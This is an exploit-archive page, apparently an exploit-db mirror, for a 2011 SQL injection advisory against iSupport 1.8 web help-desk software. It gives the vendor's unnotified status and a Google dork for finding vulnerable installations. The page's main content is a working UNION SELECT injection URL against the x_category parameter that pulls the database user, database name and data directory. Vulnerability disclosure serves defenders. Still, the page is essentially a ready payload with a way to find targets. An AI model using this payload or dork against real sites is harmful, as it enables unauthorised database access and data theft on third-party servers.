iSupport 1.8 SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : iSupport 1.8 SQL Injection Vulnerability
# Published : 2011-06-23
# Author :
# Previous Title : TCExam <=11.2.011 Multiple SQL Injection Vulnerabilities
# Next Title : Tradingeye E-commerce Shopping Cart Multiple Vulnerabilities

iSupport 1.8 SQL Injection Vulnerability

# Date: 2011-06-23
# Author: Brendan Coles <bcoles@gmail.com>
# Advisory: http://itsecuritysolutions.org/2011-06-23-iSupport-1.8-SQL-Injection-Vulnerability/

# Software: iSupport
# Version: <= 1.8
# Homepage: http://www.idevspot.com/iSupport.php
# Google Dork: "Powered by [ iSupport 1.8 ]"

# Vendor: idevSpot
# Homepage: http://www.idevspot.com/
# Notified: Unnotified

# SQL Injection:

http://localhost/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=null union select null,concat(user(),0x3a,database(),0x3a,@@datadir),null,null,null,null--